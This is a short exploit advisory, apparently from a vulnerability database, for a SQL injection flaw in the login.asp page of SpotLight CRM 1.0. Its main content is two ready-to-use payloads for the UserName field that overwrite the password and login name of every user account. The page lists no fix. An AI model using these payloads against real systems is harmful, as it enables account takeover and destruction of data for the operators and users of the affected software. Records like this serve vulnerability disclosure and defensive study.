SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability

2006-12-09 00:00:00

*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

#

Fixes

No fixes

In order to submit a new fix you need to be registered.